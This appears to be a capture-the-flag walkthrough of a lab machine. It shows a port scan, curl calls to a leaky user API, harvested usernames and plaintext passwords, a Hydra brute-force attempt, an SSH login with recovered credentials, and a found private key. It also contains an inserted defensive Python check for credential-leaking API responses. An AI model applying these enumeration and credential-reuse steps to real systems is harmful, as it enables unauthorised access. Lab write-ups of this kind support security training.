```
sudo nmap 192.168.79.125 -p- -sS -sV
Not shown: 65531 filtered ports
PORT      STATE SERVICE    VERSION
8080/tcp  open  http-proxy
12445/tcp open  unknown
18030/tcp open  http       Apache httpd 2.4.46 ((Unix))
43022/tcp open  ssh        OpenSSH 8.4 (protocol 2.0)
```
Browsing to port 8080 takes us to a web page for haikus.
We can individually browse to each haiku.
Checking the page source for any haiku reveals a comment referring to an API.
Running curl against the API reveals further information:

```
curl http://192.168.79.125:8080/api/
```

Running curl against the user API directory reveals sensitive information regarding each user.

```
curl http://192.168.79.125:8080/api/user/
```
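A defender-side check for the flaw this step relies on, as an added example that is not part of the original write-up: it walks a JSON response for credential-like keys and shows an allowlist serializer that removes them. The field names, markers and sample response are constructed assumptions, since the write-up does not show the API's schema.

```python
import json

# Substrings that mark a key as credential-like (an assumption for this example).
SENSITIVE_MARKERS = ("password", "passwd", "secret", "token", "apikey", "api_key")

# Fields the public listing is allowed to expose (hypothetical schema).
PUBLIC_USER_FIELDS = ("login", "firstName", "description")

# Constructed sample of an over-sharing user listing; placeholder values only.
SAMPLE_RESPONSE = json.dumps([
    {"login": "user1", "firstName": "Ann", "description": "Editor",
     "password": "PLACEHOLDER-1"},
    {"login": "user2", "firstName": "Bob", "description": "Admin",
     "password": "PLACEHOLDER-2", "profile": {"resetToken": "PLACEHOLDER-3"}},
])


def find_sensitive_fields(node, path="$"):
    """Walk decoded JSON and return the path of every credential-like key."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if any(marker in key.lower() for marker in SENSITIVE_MARKERS):
                hits.append(child)
            hits.extend(find_sensitive_fields(value, child))
    elif isinstance(node, list):
        for index, item in enumerate(node):
            hits.extend(find_sensitive_fields(item, f"{path}[{index}]"))
    return hits


def to_public_user(record):
    """Build the outbound object from an allowlist so unlisted fields never leave the server."""
    return {field: record[field] for field in PUBLIC_USER_FIELDS if field in record}


def audit_response(body):
    """Return the credential-like paths found in a raw JSON response body."""
    return find_sensitive_fields(json.loads(body))


if __name__ == "__main__":
    print("before:", audit_response(SAMPLE_RESPONSE))
    hardened = json.dumps([to_public_user(u) for u in json.loads(SAMPLE_RESPONSE)])
    print("after: ", audit_response(hardened))
```

Run as a test against every unauthenticated endpoint of your own API, a check like this fails the build as soon as a serializer starts returning a stored credential.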
Compiling the login names and passwords of each user gives us a user list and a password list.
{% tabs %} {% tab title="Users" %}
rjackson
dademola
jvargas
jsanchez
{% endtab %} {% endtabs %}
{% tabs %} {% tab title="Passwords" %}
yYJcgYqszv4aGQ
ExplainSlowQuest110
KTuGcSW6Zxwd0Q
d52cQ1BzyNQycg
OuQ96hcgiM5o9w
{% endtab %} {% endtabs %}
I then tried brute-forcing this with Hydra and was unable to get a result.
Inspecting the information we found further, we see that all the users are 'Editors' and David is an admin. The password associated with David is also greatly different from the rest. I then tried a manual login with SSH.
```
ssh -p 43022 [email protected]
```
Valid credentials: dademola:ExplainSlowQuest110
Looking for other users in /home/, we see there is also a Git user. Checking the contents of that directory, we also find an id_rsa key.